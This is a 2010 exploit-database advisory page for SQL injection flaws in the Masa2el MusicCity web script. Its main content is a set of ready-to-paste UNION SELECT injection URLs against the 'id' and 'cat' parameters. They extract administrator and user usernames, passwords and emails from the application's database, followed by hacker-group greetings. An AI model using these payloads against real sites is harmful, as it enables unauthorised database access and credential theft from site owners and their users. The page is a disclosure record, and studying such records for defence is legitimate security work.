Masa2el MusicCity multiple remote SQL injection vulnerabilities

2010.02.25
Credit: JIKO
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

----------[exploit Debut] [ Remote SQL Injection Vulnerability] ----------[Script Info] Moi : JIKO Site : No-exploit.Com Email : mm :( Moghla9 Ferme Closed ----------[Script Info] Site:http : http://www.masa2el.com Download : http://www.masa2el.com/index.php?go=dl&type=d&id=4 ----------[exploit Info] >>|~[SQL] Admin Info : http://localhost/Path/index.php?go=singer&id=-13 union select 0,concat(UserName,0x3a,PasSword),2,3 from masa2el_admin-- http://localhost/Path/index.php?go=singer&id=-13 union select 0,concat(UserName,0x3a,PasSword),2,3 from masa2el_user-- User Info : http://localhost/Path/?cat=-999999999 union select 0,concat(UserName,0x3a,PasSword,0x3a,email),2,3 from masa2el_user-- http://localhost/Path/?cat=-999999999 union select 0,concat(UserName,0x3a,PasSword),2,3 from masa2el_admin-- Merci :Allah amis :HxH, Cyb3r-DeViL, The Sadhacker, kasper, SkuLL-HacKeR , ZaIdOoHxHaCkEr ,ViRuSMaN Member No-exploit.Com,all friends ----------[exploit Fin] ________________________________ Vous cherchez l'intgrale des clips de Michael Jackson ? Bing ! Trouvez !<http://www.bing.com/videos/search?q=Michael+Jackson&FORM=MVDE6>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top